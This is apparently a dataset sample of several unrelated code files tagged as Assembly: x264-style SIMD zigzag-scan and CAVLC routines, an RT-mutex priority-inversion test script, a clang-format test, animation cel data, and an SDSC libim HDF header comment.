SCAN_8x8
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_frame( dctcoef level[64], dctcoef dct[8][8] )
;-----------------------------------------------------------------------------
; Output order:
; 0 8 1 2 9 16 24 17
; 10 3 4 11 18 25 32 40
; 33 26 19 12 5 6 13 20
; 27 34 41 48 56 49 42 35
; 28 21 14 7 15 22 29 36
; 43 50 57 58 51 44 37 30
; 23 31 38 45 52 59 60 53
; 46 39 47 54 61 62 55 63
%macro SCAN_8x8_FRAME 5
cglobal zigzag_scan_8x8_frame, 2,2,8
mova m0, [r1]
mova m1, [r1+ 8*SIZEOF_DCTCOEF]
movu m2, [r1+14*SIZEOF_DCTCOEF]
movu m3, [r1+21*SIZEOF_DCTCOEF]
mova m4, [r1+28*SIZEOF_DCTCOEF]
punpckl%4 m5, m0, m1
psrl%2 m0, %1
punpckh%4 m6, m1, m0
punpckl%3 m5, m0
punpckl%3 m1, m1
punpckh%4 m1, m3
mova m7, [r1+52*SIZEOF_DCTCOEF]
mova m0, [r1+60*SIZEOF_DCTCOEF]
punpckh%4 m1, m2
punpckl%4 m2, m4
punpckh%4 m4, m3
punpckl%3 m3, m3
punpckh%4 m3, m2
mova [r0], m5
mova [r0+ 4*SIZEOF_DCTCOEF], m1
mova [r0+ 8*SIZEOF_DCTCOEF], m6
punpckl%4 m6, m0
punpckl%4 m6, m7
mova m1, [r1+32*SIZEOF_DCTCOEF]
movu m5, [r1+39*SIZEOF_DCTCOEF]
movu m2, [r1+46*SIZEOF_DCTCOEF]
movu [r0+35*SIZEOF_DCTCOEF], m3
movu [r0+47*SIZEOF_DCTCOEF], m4
punpckh%4 m7, m0
psll%2 m0, %1
punpckh%3 m3, m5, m5
punpckl%4 m5, m1
punpckh%4 m1, m2
mova [r0+52*SIZEOF_DCTCOEF], m6
movu [r0+13*SIZEOF_DCTCOEF], m5
movu m4, [r1+11*SIZEOF_DCTCOEF]
movu m6, [r1+25*SIZEOF_DCTCOEF]
punpckl%4 m5, m7
punpckl%4 m1, m3
punpckh%3 m0, m7
mova m3, [r1+ 4*SIZEOF_DCTCOEF]
movu m7, [r1+18*SIZEOF_DCTCOEF]
punpckl%4 m2, m5
movu [r0+25*SIZEOF_DCTCOEF], m1
mova m1, m4
mova m5, m6
punpckl%4 m4, m3
punpckl%4 m6, m7
punpckh%4 m1, m3
punpckh%4 m5, m7
punpckh%3 m3, m6, m4
punpckh%3 m7, m5, m1
punpckl%3 m6, m4
punpckl%3 m5, m1
movu m4, [r1+35*SIZEOF_DCTCOEF]
movu m1, [r1+49*SIZEOF_DCTCOEF]
pshuf%5 m6, m6, q0123
pshuf%5 m5, m5, q0123
mova [r0+60*SIZEOF_DCTCOEF], m0
mova [r0+56*SIZEOF_DCTCOEF], m2
movu m0, [r1+42*SIZEOF_DCTCOEF]
mova m2, [r1+56*SIZEOF_DCTCOEF]
movu [r0+17*SIZEOF_DCTCOEF], m3
mova [r0+32*SIZEOF_DCTCOEF], m7
movu [r0+10*SIZEOF_DCTCOEF], m6
movu [r0+21*SIZEOF_DCTCOEF], m5
punpckh%4 m3, m0, m4
punpckh%4 m7, m2, m1
punpckl%4 m0, m4
punpckl%4 m2, m1
punpckl%3 m4, m2, m0
punpckl%3 m1, m7, m3
punpckh%3 m2, m0
punpckh%3 m7, m3
pshuf%5 m2, m2, q0123
pshuf%5 m7, m7, q0123
mova [r0+28*SIZEOF_DCTCOEF], m4
movu [r0+43*SIZEOF_DCTCOEF], m1
movu [r0+39*SIZEOF_DCTCOEF], m2
movu [r0+50*SIZEOF_DCTCOEF], m7
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
SCAN_8x8_FRAME 4 , dq, qdq, dq, d
INIT_XMM avx
SCAN_8x8_FRAME 4 , dq, qdq, dq, d
%else
INIT_MMX mmx2
SCAN_8x8_FRAME 16, q , dq , wd, w
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_frame( dctcoef level[16], dctcoef dct[4][4] )
;-----------------------------------------------------------------------------
%macro SCAN_4x4 4
cglobal zigzag_scan_4x4_frame, 2,2,6
mova m0, [r1+ 0*SIZEOF_DCTCOEF]
mova m1, [r1+ 4*SIZEOF_DCTCOEF]
mova m2, [r1+ 8*SIZEOF_DCTCOEF]
mova m3, [r1+12*SIZEOF_DCTCOEF]
punpckl%4 m4, m0, m1
psrl%2 m0, %1
punpckl%3 m4, m0
mova [r0+ 0*SIZEOF_DCTCOEF], m4
punpckh%4 m0, m2
punpckh%4 m4, m2, m3
psll%2 m3, %1
punpckl%3 m2, m2
punpckl%4 m5, m1, m3
punpckh%3 m1, m1
punpckh%4 m5, m2
punpckl%4 m1, m0
punpckh%3 m3, m4
mova [r0+ 4*SIZEOF_DCTCOEF], m5
mova [r0+ 8*SIZEOF_DCTCOEF], m1
mova [r0+12*SIZEOF_DCTCOEF], m3
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
SCAN_4x4 4, dq, qdq, dq
INIT_XMM avx
SCAN_4x4 4, dq, qdq, dq
%else
INIT_MMX mmx
SCAN_4x4 16, q , dq , wd
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_frame( int16_t level[16], int16_t dct[4][4] )
;-----------------------------------------------------------------------------
%macro SCAN_4x4_FRAME 0
cglobal zigzag_scan_4x4_frame, 2,2
mova m1, [r1+16]
mova m0, [r1+ 0]
pshufb m1, [pb_scan4frameb]
pshufb m0, [pb_scan4framea]
psrldq m2, m1, 6
palignr m1, m0, 6
pslldq m0, 10
palignr m2, m0, 10
mova [r0+ 0], m1
mova [r0+16], m2
RET
%endmacro
INIT_XMM ssse3
SCAN_4x4_FRAME
INIT_XMM avx
SCAN_4x4_FRAME
INIT_XMM xop
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [r1+ 0]
mova m1, [r1+16]
vpperm m2, m0, m1, [pb_scan4frame2a]
vpperm m1, m0, m1, [pb_scan4frame2b]
mova [r0+ 0], m2
mova [r0+16], m1
RET
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_field( int32_t level[16], int32_t dct[4][4] )
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal zigzag_scan_4x4_field, 2,2
movu m0, [r1+ 8]
pshufd m0, m0, q3102
mova m1, [r1+32]
mova m2, [r1+48]
movu [r0+ 8], m0
mova [r0+32], m1
mova [r0+48], m2
movq mm0, [r1]
movq [r0], mm0
movq mm0, [r1+24]
movq [r0+24], mm0
RET
%else
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_field( int16_t level[16], int16_t dct[4][4] )
;-----------------------------------------------------------------------------
INIT_XMM sse
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
mova m1, [r1+16]
pshufw mm0, [r1+4], q3102
mova [r0], m0
mova [r0+16], m1
movq [r0+4], mm0
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_field( int16_t level[64], int16_t dct[8][8] )
;-----------------------------------------------------------------------------
; Output order:
; 0 1 2 8 9 3 4 10
; 16 11 5 6 7 12 17 24
; 18 13 14 15 19 25 32 26
; 20 21 22 23 27 33 40 34
; 28 29 30 31 35 41 48 42
; 36 37 38 39 43 49 50 44
; 45 46 47 51 56 57 52 53
; 54 55 58 59 60 61 62 63
%undef SCAN_8x8
%macro SCAN_8x8 5
cglobal zigzag_scan_8x8_field, 2,3,8
mova m0, [r1+ 0*SIZEOF_DCTCOEF] ; 03 02 01 00
mova m1, [r1+ 4*SIZEOF_DCTCOEF] ; 07 06 05 04
mova m2, [r1+ 8*SIZEOF_DCTCOEF] ; 11 10 09 08
pshuf%1 m3, m0, q3333 ; 03 03 03 03
movd r2d, m2 ; 09 08
pshuf%1 m2, m2, q0321 ; 08 11 10 09
punpckl%2 m3, m1 ; 05 03 04 03
pinsr%1 m0, r2d, 3 ; 08 02 01 00
punpckl%2 m4, m2, m3 ; 04 10 03 09
pshuf%1 m4, m4, q2310 ; 10 04 03 09
mova [r0+ 0*SIZEOF_DCTCOEF], m0 ; 08 02 01 00
mova [r0+ 4*SIZEOF_DCTCOEF], m4 ; 10 04 03 09
mova m3, [r1+12*SIZEOF_DCTCOEF] ; 15 14 13 12
mova m5, [r1+16*SIZEOF_DCTCOEF] ; 19 18 17 16
punpckl%3 m6, m5 ; 17 16 XX XX
psrl%4 m1, %5 ; XX 07 06 05
punpckh%2 m6, m2 ; 08 17 11 16
punpckl%3 m6, m1 ; 06 05 11 16
mova [r0+ 8*SIZEOF_DCTCOEF], m6 ; 06 05 11 16
psrl%4 m1, %5 ; XX XX 07 06
punpckl%2 m1, m5 ; 17 07 16 06
mova m0, [r1+20*SIZEOF_DCTCOEF] ; 23 22 21 20
mova m2, [r1+24*SIZEOF_DCTCOEF] ; 27 26 25 24
punpckh%3 m1, m1 ; 17 07 17 07
punpckl%2 m6, m3, m2 ; 25 13 24 12
pextr%1 r2d, m5, 2
mova [r0+24*SIZEOF_DCTCOEF], m0 ; 23 22 21 20
punpckl%2 m1, m6 ; 24 17 12 07
mova [r0+12*SIZEOF_DCTCOEF], m1
pinsr%1 m3, r2d, 0 ; 15 14 13 18
mova [r0+16*SIZEOF_DCTCOEF], m3 ; 15 14 13 18
mova m7, [r1+28*SIZEOF_DCTCOEF]
mova m0, [r1+32*SIZEOF_DCTCOEF] ; 35 34 33 32
psrl%4 m5, %5*3 ; XX XX XX 19
pshuf%1 m1, m2, q3321 ; 27 27 26 25
punpckl%2 m5, m0 ; 33 XX 32 19
psrl%4 m2, %5*3 ; XX XX XX 27
punpckl%2 m5, m1 ; 26 32 25 19
mova [r0+32*SIZEOF_DCTCOEF], m7
mova [r0+20*SIZEOF_DCTCOEF], m5 ; 26 32 25 19
mova m7, [r1+36*SIZEOF_DCTCOEF]
mova m1, [r1+40*SIZEOF_DCTCOEF] ; 43 42 41 40
pshuf%1 m3, m0, q3321 ; 35 35 34 33
punpckl%2 m2, m1 ; 41 XX 40 27
mova [r0+40*SIZEOF_DCTCOEF], m7
punpckl%2 m2, m3 ; 34 40 33 27
mova [r0+28*SIZEOF_DCTCOEF], m2
mova m7, [r1+44*SIZEOF_DCTCOEF] ; 47 46 45 44
mova m2, [r1+48*SIZEOF_DCTCOEF] ; 51 50 49 48
psrl%4 m0, %5*3 ; XX XX XX 35
punpckl%2 m0, m2 ; 49 XX 48 35
pshuf%1 m3, m1, q3321 ; 43 43 42 41
punpckl%2 m0, m3 ; 42 48 41 35
mova [r0+36*SIZEOF_DCTCOEF], m0
pextr%1 r2d, m2, 3 ; 51
psrl%4 m1, %5*3 ; XX XX XX 43
punpckl%2 m1, m7 ; 45 XX 44 43
psrl%4 m2, %5 ; XX 51 50 49
punpckl%2 m1, m2 ; 50 44 49 43
pshuf%1 m1, m1, q2310 ; 44 50 49 43
mova [r0+44*SIZEOF_DCTCOEF], m1
psrl%4 m7, %5 ; XX 47 46 45
pinsr%1 m7, r2d, 3 ; 51 47 46 45
mova [r0+48*SIZEOF_DCTCOEF], m7
mova m0, [r1+56*SIZEOF_DCTCOEF] ; 59 58 57 56
mova m1, [r1+52*SIZEOF_DCTCOEF] ; 55 54 53 52
mova m7, [r1+60*SIZEOF_DCTCOEF]
punpckl%3 m2, m0, m1 ; 53 52 57 56
punpckh%3 m1, m0 ; 59 58 55 54
mova [r0+52*SIZEOF_DCTCOEF], m2
mova [r0+56*SIZEOF_DCTCOEF], m1
mova [r0+60*SIZEOF_DCTCOEF], m7
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse4
SCAN_8x8 d, dq, qdq, dq, 4
INIT_XMM avx
SCAN_8x8 d, dq, qdq, dq, 4
%else
INIT_MMX mmx2
SCAN_8x8 w, wd, dq , q , 16
%endif
;-----------------------------------------------------------------------------
; void zigzag_sub_4x4_frame( int16_t level[16], const uint8_t *src, uint8_t *dst )
;-----------------------------------------------------------------------------
%macro ZIGZAG_SUB_4x4 2
%ifidn %1, ac
cglobal zigzag_sub_4x4%1_%2, 4,4,8
%else
cglobal zigzag_sub_4x4%1_%2, 3,3,8
%endif
movd m0, [r1+0*FENC_STRIDE]
movd m1, [r1+1*FENC_STRIDE]
movd m2, [r1+2*FENC_STRIDE]
movd m3, [r1+3*FENC_STRIDE]
movd m4, [r2+0*FDEC_STRIDE]
movd m5, [r2+1*FDEC_STRIDE]
movd m6, [r2+2*FDEC_STRIDE]
movd m7, [r2+3*FDEC_STRIDE]
movd [r2+0*FDEC_STRIDE], m0
movd [r2+1*FDEC_STRIDE], m1
movd [r2+2*FDEC_STRIDE], m2
movd [r2+3*FDEC_STRIDE], m3
punpckldq m0, m1
punpckldq m2, m3
punpckldq m4, m5
punpckldq m6, m7
punpcklqdq m0, m2
punpcklqdq m4, m6
mova m7, [pb_sub4%2]
pshufb m0, m7
pshufb m4, m7
mova m7, [hsub_mul]
punpckhbw m1, m0, m4
punpcklbw m0, m4
pmaddubsw m1, m7
pmaddubsw m0, m7
%ifidn %1, ac
movd r2d, m0
pand m0, [pb_subacmask]
%endif
mova [r0+ 0], m0
por m0, m1
pxor m2, m2
mova [r0+16], m1
pcmpeqb m0, m2
pmovmskb eax, m0
%ifidn %1, ac
mov [r3], r2w
%endif
sub eax, 0xffff
shr eax, 31
RET
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_XMM ssse3
ZIGZAG_SUB_4x4 , frame
ZIGZAG_SUB_4x4 ac, frame
ZIGZAG_SUB_4x4 , field
ZIGZAG_SUB_4x4 ac, field
INIT_XMM avx
ZIGZAG_SUB_4x4 , frame
ZIGZAG_SUB_4x4 ac, frame
ZIGZAG_SUB_4x4 , field
ZIGZAG_SUB_4x4 ac, field
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH == 0
INIT_XMM xop
cglobal zigzag_scan_8x8_field, 2,3,7
lea r2, [pb_scan8field1]
%define off(m) (r2+m-pb_scan8field1)
mova m0, [r1+ 0]
mova m1, [r1+ 16]
vpperm m5, m0, m1, [off(pb_scan8field1)]
mova [r0+ 0], m5
vpperm m0, m0, m1, [off(pb_scan8field2a)]
mova m2, [r1+ 32]
mova m3, [r1+ 48]
vpperm m5, m2, m3, [off(pb_scan8field2b)]
por m5, m0
mova [r0+ 16], m5
mova m4, [off(pb_scan8field3b)]
vpperm m1, m1, m2, [off(pb_scan8field3a)]
mova m0, [r1+ 64]
vpperm m5, m3, m0, m4
por m5, m1
mova [r0+ 32], m5
; 4b, 5b are the same as pb_scan8field3b.
; 5a is the same as pb_scan8field4a.
mova m5, [off(pb_scan8field4a)]
vpperm m2, m2, m3, m5
mova m1, [r1+ 80]
vpperm m6, m0, m1, m4
por m6, m2
mova [r0+ 48], m6
vpperm m3, m3, m0, m5
mova m2, [r1+ 96]
vpperm m5, m1, m2, m4
por m5, m3
mova [r0+ 64], m5
vpperm m5, m0, m1, [off(pb_scan8field6)]
mova [r0+ 80], m5
vpperm m5, m1, m2, [off(pb_scan8field7)]
mov r2d, [r1+ 98]
mov [r0+ 90], r2d
mova [r0+ 96], m5
mova m3, [r1+112]
movd [r0+104], m3
mov r2d, [r1+108]
mova [r0+112], m3
mov [r0+112], r2d
%undef off
RET
cglobal zigzag_scan_8x8_frame, 2,3,8
lea r2, [pb_scan8frame1]
%define off(m) (r2+m-pb_scan8frame1)
mova m7, [r1+ 16]
mova m3, [r1+ 32]
vpperm m7, m7, m3, [off(pb_scan8framet1)] ; 8 9 14 15 16 17 21 22
mova m2, [r1+ 48]
vpperm m0, m3, m2, [off(pb_scan8framet2)] ; 18 19 20 23 25 31 26 30
mova m1, [r1+ 80]
mova m4, [r1+ 64]
vpperm m3, m4, m1, [off(pb_scan8framet3)] ; 32 33 37 38 40 43 44 45
vpperm m6, m0, m3, [off(pb_scan8framet4)] ; 18 23 25 31 32 38 40 45
vpperm m5, m0, m3, [off(pb_scan8framet5)] ; 19 20 26 30 33 37 43 44
vpperm m3, m2, m4, [off(pb_scan8framet6)] ; 24 27 28 29 34 35 36 39
mova m4, [r1+ 96]
vpperm m4, m1, m4, [off(pb_scan8framet7)] ; 41 42 46 47 48 49 54 55
mova m1, [r1+ 0]
vpperm m2, m1, m3, [off(pb_scan8framet8)] ; 0 1 2 7 24 28 29 36
vpperm m1, m2, m7, [off(pb_scan8frame1)] ; 0 8 1 2 9 16 24 17
mova [r0+ 0], m1
movh m0, [r1+ 6]
movhps m0, [r1+ 20] ; 3 4 5 6 10 11 12 13
vpperm m1, m0, m6, [off(pb_scan8frame2)] ; 10 3 4 11 18 25 32 40
mova [r0+ 16], m1
vpperm m1, m0, m5, [off(pb_scan8frame3)] ; 33 26 19 12 5 6 13 20
mova [r0+ 32], m1
vpperm m1, m2, m7, [off(pb_scan8frame5)] ; 28 21 14 7 15 22 29 36
mova [r0+ 64], m1
movh m0, [r1+100]
movhps m0, [r1+114] ; 50 51 52 53 57 58 59 60
vpperm m1, m5, m0, [off(pb_scan8frame6)] ; 43 50 57 58 51 44 37 30
mova [r0+ 80], m1
vpperm m1, m6, m0, [off(pb_scan8frame7)] ; 23 31 38 45 52 59 60 53
mova [r0+ 96], m1
mova m1, [r1+112]
vpperm m0, m3, m1, [off(pb_scan8framet9)] ; 27 34 35 39 56 61 62 63
vpperm m1, m0, m4, [off(pb_scan8frame4)] ; 27 34 41 48 56 49 42 35
mova [r0+ 48], m1
vpperm m1, m0, m4, [off(pb_scan8frame8)] ; 46 39 47 54 61 62 55 63
mova [r0+112], m1
%undef off
RET
%endif
;-----------------------------------------------------------------------------
; void zigzag_interleave_8x8_cavlc( int16_t *dst, int16_t *src, uint8_t *nnz )
;-----------------------------------------------------------------------------
%macro INTERLEAVE 2
mova m0, [r1+(%1*4+ 0)*SIZEOF_PIXEL]
mova m1, [r1+(%1*4+ 8)*SIZEOF_PIXEL]
mova m2, [r1+(%1*4+16)*SIZEOF_PIXEL]
mova m3, [r1+(%1*4+24)*SIZEOF_PIXEL]
TRANSPOSE4x4%2 0,1,2,3,4
mova [r0+(%1+ 0)*SIZEOF_PIXEL], m0
mova [r0+(%1+32)*SIZEOF_PIXEL], m1
mova [r0+(%1+64)*SIZEOF_PIXEL], m2
mova [r0+(%1+96)*SIZEOF_PIXEL], m3
packsswb m0, m1
ACCUM por, 6, 2, %1
ACCUM por, 7, 3, %1
ACCUM por, 5, 0, %1
%endmacro
%macro ZIGZAG_8x8_CAVLC 1
cglobal zigzag_interleave_8x8_cavlc, 3,3,8
INTERLEAVE 0, %1
INTERLEAVE 8, %1
INTERLEAVE 16, %1
INTERLEAVE 24, %1
packsswb m6, m7
packsswb m5, m6
packsswb m5, m5
pxor m0, m0
%if HIGH_BIT_DEPTH
packsswb m5, m5
%endif
pcmpeqb m5, m0
paddb m5, [pb_1]
movd r0d, m5
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
ZIGZAG_8x8_CAVLC D
INIT_XMM avx
ZIGZAG_8x8_CAVLC D
%else
INIT_MMX mmx
ZIGZAG_8x8_CAVLC W
%endif
%macro INTERLEAVE_XMM 1
mova m0, [r1+%1*4+ 0]
mova m1, [r1+%1*4+16]
mova m4, [r1+%1*4+32]
mova m5, [r1+%1*4+48]
SBUTTERFLY wd, 0, 1, 6
SBUTTERFLY wd, 4, 5, 7
SBUTTERFLY wd, 0, 1, 6
SBUTTERFLY wd, 4, 5, 7
movh [r0+%1+ 0], m0
movhps [r0+%1+ 32], m0
movh [r0+%1+ 64], m1
movhps [r0+%1+ 96], m1
movh [r0+%1+ 8], m4
movhps [r0+%1+ 40], m4
movh [r0+%1+ 72], m5
movhps [r0+%1+104], m5
ACCUM por, 2, 0, %1
ACCUM por, 3, 1, %1
por m2, m4
por m3, m5
%endmacro
%if HIGH_BIT_DEPTH == 0
%macro ZIGZAG_8x8_CAVLC 0
cglobal zigzag_interleave_8x8_cavlc, 3,3,8
INTERLEAVE_XMM 0
INTERLEAVE_XMM 16
packsswb m2, m3
pxor m5, m5
packsswb m2, m2
packsswb m2, m2
pcmpeqb m5, m2
paddb m5, [pb_1]
movd r0d, m5
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endmacro
INIT_XMM sse2
ZIGZAG_8x8_CAVLC
INIT_XMM avx
ZIGZAG_8x8_CAVLC
INIT_YMM avx2
cglobal zigzag_interleave_8x8_cavlc, 3,3,6
mova m0, [r1+ 0]
mova m1, [r1+32]
mova m2, [r1+64]
mova m3, [r1+96]
mova m5, [deinterleave_shufd]
SBUTTERFLY wd, 0, 1, 4
SBUTTERFLY wd, 2, 3, 4
SBUTTERFLY wd, 0, 1, 4
SBUTTERFLY wd, 2, 3, 4
vpermd m0, m5, m0
vpermd m1, m5, m1
vpermd m2, m5, m2
vpermd m3, m5, m3
mova [r0+ 0], xm0
mova [r0+ 16], xm2
vextracti128 [r0+ 32], m0, 1
vextracti128 [r0+ 48], m2, 1
mova [r0+ 64], xm1
mova [r0+ 80], xm3
vextracti128 [r0+ 96], m1, 1
vextracti128 [r0+112], m3, 1
packsswb m0, m2 ; nnz0, nnz1
packsswb m1, m3 ; nnz2, nnz3
packsswb m0, m1 ; {nnz0,nnz2}, {nnz1,nnz3}
vpermq m0, m0, q3120 ; {nnz0,nnz1}, {nnz2,nnz3}
pxor m5, m5
pcmpeqq m0, m5
pmovmskb r0d, m0
not r0d
and r0d, 0x01010101
mov [r2+0], r0w
shr r0d, 16
mov [r2+8], r0w
RET
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
INIT_ZMM avx512
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [scan_frame_avx512]
vpermd m0, m0, [r1]
mova [r0], m0
RET
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
pshufd xmm1, [r1+8], q3102
mova [r0], m0
movu [r0+8], xmm1
RET
cglobal zigzag_scan_8x8_frame, 2,2
psrld m0, [scan_frame_avx512], 4
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
mov r1d, 0x01fe7f80
kmovd k1, r1d
kshiftrd k2, k1, 16
vpermd m5, m0, m3 ; __ __ __ __ __ __ __ __ __ __ __ __ __ __ 32 40
psrld m6, m0, 5
vpermi2d m0, m1, m2 ; 0 8 1 2 9 16 24 17 10 3 4 11 18 25 __ __
vmovdqa64 m0 {k1}, m5
mova [r0+0*64], m0
mova m5, m1
vpermt2d m1, m6, m2 ; __ 26 19 12 5 6 13 20 27 __ __ __ __ __ __ __
psrld m0, m6, 5
vpermi2d m6, m3, m4 ; 33 __ __ __ __ __ __ __ __ 34 41 48 56 49 42 35
vmovdqa32 m6 {k2}, m1
mova [r0+1*64], m6
vpermt2d m5, m0, m2 ; 28 21 14 7 15 22 29 __ __ __ __ __ __ __ __ 30
psrld m1, m0, 5
vpermi2d m0, m3, m4 ; __ __ __ __ __ __ __ 36 43 50 57 58 51 44 37 __
vmovdqa32 m5 {k1}, m0
mova [r0+2*64], m5
vpermt2d m3, m1, m4 ; __ __ 38 45 52 59 60 53 46 39 47 54 61 62 55 63
vpermd m2, m1, m2 ; 23 31 __ __ __ __ __ __ __ __ __ __ __ __ __ __
vmovdqa64 m2 {k2}, m3
mova [r0+3*64], m2
RET
cglobal zigzag_scan_8x8_field, 2,2
mova m0, [scan_field_avx512]
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
mov r1d, 0x3f
kmovb k1, r1d
psrld m5, m0, 5
vpermi2d m0, m1, m2
vmovdqa64 m1 {k1}, m3 ; 32 33 34 35 36 37 38 39 40 41 42 43 12 13 14 15
vpermt2d m1, m5, m2
psrld m5, 5
vmovdqa64 m2 {k1}, m4 ; 48 49 50 51 52 53 54 55 56 57 58 59 28 29 30 31
vpermt2d m2, m5, m3
psrld m5, 5
vpermt2d m3, m5, m4
mova [r0+0*64], m0
mova [r0+1*64], m1
mova [r0+2*64], m2
mova [r0+3*64], m3
RET
cglobal zigzag_interleave_8x8_cavlc, 3,3
mova m0, [cavlc_shuf_avx512]
mova m1, [r1+0*64]
mova m2, [r1+1*64]
mova m3, [r1+2*64]
mova m4, [r1+3*64]
kxnorb k1, k1, k1
por m7, m1, m2
psrld m5, m0, 5
vpermi2d m0, m1, m2 ; a0 a1 b0 b1
vpternlogd m7, m3, m4, 0xfe ; m1|m2|m3|m4
psrld m6, m5, 5
vpermi2d m5, m3, m4 ; b2 b3 a2 a3
vptestmd k0, m7, m7
vpermt2d m1, m6, m2 ; c0 c1 d0 d1
psrld m6, 5
vpermt2d m3, m6, m4 ; d2 d3 c2 c3
vshufi32x4 m2, m0, m5, q1032 ; b0 b1 b2 b3
vmovdqa32 m5 {k1}, m0 ; a0 a1 a2 a3
vshufi32x4 m4, m1, m3, q1032 ; d0 d1 d2 d3
vmovdqa32 m3 {k1}, m1 ; c0 c1 c2 c3
mova [r0+0*64], m5
mova [r0+1*64], m2
mova [r0+2*64], m3
mova [r0+3*64], m4
kmovw r1d, k0
test r1d, 0x1111
setnz [r2]
test r1d, 0x2222
setnz [r2+1]
test r1d, 0x4444
setnz [r2+8]
test r1d, 0x8888
setnz [r2+9]
RET
%else ; !HIGH_BIT_DEPTH
INIT_YMM avx512
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [scan_frame_avx512]
vpermw m0, m0, [r1]
mova [r0], m0
RET
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
pshuflw xmm1, [r1+4], q3102
mova [r0], m0
movq [r0+4], xmm1
RET
INIT_ZMM avx512
cglobal zigzag_scan_8x8_frame, 2,2
psrlw m0, [scan_frame_avx512], 4
scan8_avx512:
mova m1, [r1]
mova m2, [r1+64]
psrlw m3, m0, 6
vpermi2w m0, m1, m2
vpermt2w m1, m3, m2
mova [r0], m0
mova [r0+64], m1
RET
cglobal zigzag_scan_8x8_field, 2,2
mova m0, [scan_field_avx512]
jmp scan8_avx512
cglobal zigzag_interleave_8x8_cavlc, 3,3
mova m0, [cavlc_shuf_avx512]
mova m1, [r1]
mova m2, [r1+64]
psrlw m3, m0, 6
vpermi2w m0, m1, m2
vpermt2w m1, m3, m2
kxnorb k2, k2, k2
vptestmd k0, m0, m0
vptestmd k1, m1, m1
mova [r0], m0
mova [r0+64], m1
ktestw k2, k0
setnz [r2]
setnc [r2+1]
ktestw k2, k1
setnz [r2+8]
setnc [r2+9]
RET
%endif ; !HIGH_BIT_DEPTH
| {
"language": "Assembly"
} |
#
# RT-Mutex test
#
# Op: C(ommand)/T(est)/W(ait)
# | opcode
# | | threadid: 0-7
# | | | opcode argument
# | | | |
# C: lock: 0: 0
#
# Commands
#
# opcode opcode argument
# schedother nice value
# schedfifo priority
# lock lock nr (0-7)
# locknowait lock nr (0-7)
# lockint lock nr (0-7)
# lockintnowait lock nr (0-7)
# lockcont lock nr (0-7)
# unlock lock nr (0-7)
# signal 0
# reset 0
# resetevent 0
#
# Tests / Wait
#
# opcode opcode argument
#
# prioeq priority
# priolt priority
# priogt priority
# nprioeq normal priority
# npriolt normal priority
# npriogt normal priority
# locked lock nr (0-7)
# blocked lock nr (0-7)
# blockedwake lock nr (0-7)
# unlocked lock nr (0-7)
# opcodeeq command opcode or number
# opcodelt number
# opcodegt number
# eventeq number
# eventgt number
# eventlt number
#
# 2 threads 1 lock with priority inversion
#
C: resetevent: 0: 0
W: opcodeeq: 0: 0
# Set schedulers
C: schedother: 0: 0
C: schedother: 1: 0
# T0 lock L0
C: locknowait: 0: 0
W: locked: 0: 0
# T1 lock L0
C: lockintnowait: 1: 0
W: blocked: 1: 0
# Interrupt T1
C: signal: 1: 0
W: unlocked: 1: 0
T: opcodeeq: 1: -4
# Unlock and exit
C: unlock: 0: 0
W: unlocked: 0: 0
| {
"language": "Assembly"
} |
// RUN: grep -Ev "// *[A-Z-]+:" %s | clang-format -style=none \
// RUN: | FileCheck -strict-whitespace %s
// CHECK: int i;
int i;
| {
"language": "Assembly"
} |
;---------------------------------------
;
; animation cel data
;
bookf_data::
byte swing + 0
byte 0b11000000
byte bookf_start_end - bookf_data
byte no_cont
byte 240+right,28+left,255
byte 0b10000000
word bookf_data_a - bookf_data
bookf_start_end:
byte 0,0,0,0
bookf_data_a:
byte 0x04, 0x19, 0x00, 0x04, 0x00, 0x00
byte run,25,2
byte 170
byte run,3,101
byte 165
byte 229
byte run,13,101
byte 165
byte 229
byte run,3,101
byte 170
byte 170
byte run,23,85
byte 170
byte 170
byte run,23,86
byte 170
| {
"language": "Assembly"
} |
/**
** $Header: /sdsc/dev/vis/image/imtools/v3.0/libim/src/include/RCS/imhdfinternal.h,v 1.5 1995/06/29 00:32:03 bduggan Exp $
** Copyright (c) 1989-1995 San Diego Supercomputer Center (SDSC)
** a division of General Atomics, San Diego, California, USA
**
** Users and possessors of this source code are hereby granted a
** nonexclusive, royalty-free copyright and design patent license to
** use this code in individual software. License is not granted for
** commercial resale, in whole or in part, without prior written
** permission from SDSC. This source is provided "AS IS" without express
** or implied warranty of any kind.
**
** For further information contact:
** E-Mail: [email protected]
**
** Surface Mail: Information Center
** San Diego Supercomputer Center
** P.O. Box 85608
** San Diego, CA 92138-5608
** (619) 534-5000
**/
/**
** FILE
** imhdfinternal.h - HDF image file I/O include
**
** PROJECT
** libim - SDSC image manipulation library
**
** DESCRIPTION
** imhdfinternal.h contains macros and structure definitions used
** by the HDF read and write code of the image library.
**
** PUBLIC CONTENTS
** d =defined constant
** f =function
** m =defined macro
** t =typedef/struct/union
** v =variable
** ? =other
**
** IMHDFT* d tag numbers
** IMHDFNT* d MT and NT values
** IMHDFC* d color formats
**
